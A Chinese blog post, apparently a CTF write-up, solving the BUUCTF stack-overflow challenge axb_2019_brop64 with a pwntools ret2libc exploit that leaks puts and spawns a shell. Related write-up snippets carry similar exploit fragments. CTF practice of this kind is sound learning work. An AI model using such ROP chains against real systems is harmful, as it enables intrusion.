axb_2019_brop64

最新推荐文章于 2025-02-03 16:40:50 发布
最新推荐文章于 2025-02-03 16:40:50 发布
阅读量236 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62887641/article/details/133526633
版权
本文描述了在给定的64位程序中发现的栈溢出漏洞,通过ret2libc技术利用puts函数进行攻击,展示了从本地缓冲区溢出到执行系统调用的详细步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

axb_2019_brop64

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

64位,只开了NX

__int64 repeater()
{
  size_t v1; // rax
  char s[208]; // [rsp+0h] [rbp-D0h] BYREF

  printf("Please tell me:");
  memset(s, 0, 0xC8uLL);
  read(0, s, 0x400uLL);
  if ( !strcmp(s, "If there is a chance,I won't make any mistake!\n") )
  {
    puts("Wish you happy everyday!");
  }
  else
  {
    printf("Repeater:");
    v1 = strlen(s);
    write(1, s, v1);
  }
  return 0LL;
}

程序很简单,有一点点花里胡哨,看到栈溢出,看一下有没有坑点(x

思路

ret2libc,打的puts,

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26296,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
libc=ELF('libc-2.23.so')

rdi=0x0000000000400963
pl=cyclic(0xd8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400845)
sla('me',pl)
leak=get_addr_u64()-libc.sym['puts']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0xd8)+p64(rdi)+p64(sh)+p64(sys)
sla('me',pl)

ia(c)

在这里插入图片描述

BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2854
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1643
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
[BUUCTF]PWN——axb_2019_brop64
mcmuyanga的博客
01-21 1136
axb_2019_brop64 附件 步骤: 例行检查,64位程序,开启了nx 本地试运行一下,看看大概的情况 64位ida载入,第8行的read,明显的溢出漏洞 采用常规的ret2libc的方法 64位传参,要用到寄存器,先找个pop rdi 先是常规的泄露libc p.recvuntil('Please tell me:') payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendline(p
[BUUCTF-pwn]——axb_2019_brop64
Y_peak的博客
03-17 364
[BUUCTF-pwn]——axb_2019_brop64 利用这里leek地址, 找到libc基地址进而找到system, binsh,构造rop链 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',26212) #p = process('./axb_2019_brop64') elf = ELF('./axb_2019_brop64') context.log_level = 'debug
BUUCTF Pwn axb_2019_brop64 题解
qq_33348179的博客
02-03 337
找到了6个pop的地址 这个地址+9即为pop_rdi_ret 的地址。puts GOT地址为 0x601018。找到gadget是0x4007d6。生成的文件用IDA打开 二进制格式。这题是BROP 所以不下文件。找到是0x40095a。
[BUUCTF]-PWN:axb_2019_heap解析(格式化字符串漏洞,unlink,off by one)
2301_79326813的博客
02-20 585
查看保护查看ida大致就是alloc创建堆块,free释放堆块,以及fill填充堆块。
axb_2019_fmt32 wp
xia0ji233
06-08 512
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1323
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 238
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
Pwn中阶学习1-[栈溢出]/篇3
m0_52343643的博客
04-14 1858
这种题型一般是在题目没有给出程序文件的时候,我们对程序一无所知,对程序是否栈溢出、栈溢出长度、gadget地址,源函数地址等只能进行爆破得到 攻击条件: 程序存在栈溢出漏洞 服务器端的进程在崩溃后会重新启动,且启动进程地址与先前一样。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的。 BROP绕过ASLR、NX、Canary保护 步骤 爆破栈溢出长度 得到漏洞函数或main函数地址(stop gadget:使程序返回地
buu_64位fmPWN——axb_2019_fmt6464位格式化字符串改got表)不使用fmstr工具包
ngztx的博客
03-22 759
如果这样写,前面的地址数据经p64()打包后占的是8个字节,我们send 的地址和我们构造的格式化字符串中间还有好多个 ‘00’ ,而在字符串中 ‘00’ 就代表了结束,所以在printf到‘00’时,就被认为字符串已经结束了,自然不会继续往后面printf了,也即是说我们的字符串都被’00’给截断了。到这里为止,应该对%k$n有一定的了解了,还是那个原则,%k$n前面有多少个字节,那么就会向第k个参数地址中写多少。只有后面3字节不同,截取倒数第三字节和后两字节进行修改。难点3:分别计算高地址和低地址。
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 286
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuoj Pwn writeup 216-220
yongbaoii的博客
08-31 572
216 hwb2018_gettingstart 溢出覆盖就好,唯一有个浮点数,网上网站一大把,找一个转换一下就好。 exp from pwn import * context(log_level='debug') r=remote("node4.buuoj.cn","25539") r.recv() v7=0x7FFFFFFFFFFFFFFF v8=0x3FB999999999999A payload='a'*0x18+p64(v7)+p64(v8) r.send(payload) r.
mips&arm&aarch64-pwn初探
seaaseesa的博客
04-02 5257
mips&arm&aarch64-pwn初探 前言 厌倦了x86/x64 平台下的二进制漏洞利用,来看看mips/arm平台下的pwn是如何达到利用的。众所周知,mips/arm架构cpu主要用于嵌入式设备,比如路由器这些。当我们在x86/x64平台练习到一定境界后,再去探索一个新的平台下的漏洞利用,我们可以借鉴以前的方法,总之,思想都是一样的。只不过是指令的样子不同而已。 ...
BUU刷题-Pwn-axb_2019_mips(MIPS跳转bss段执行shellcode)
一个啥也不会的小菜鸡!
10-10 466
libc版本:buuoj Pwn writeup 216-220-优快云博客本地无法打通不知道为什么,通过栈溢出劫持返回地址调用read函数,通过寄存器传参向bss段写入shellcode,之后再劫持返回地址跳转到bss段!
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 983
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
axb_2019_fmt32
、moddemod
07-19 867
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
BROP攻击实例
u010796610的专栏
02-28 1456
转载于:http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/ Following the 1st session, which talked about the principle of BROP attack, this page will discuss about ho
{"count": "AXB_MTWM_CALL_FINISH_RECORD_INFO", "query": {"result": "0", "baselineTime": {"$gte": 1740758400000, "$lt": 1740844800000}}}, 变成mongo查询语句
最新发布
03-13
假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值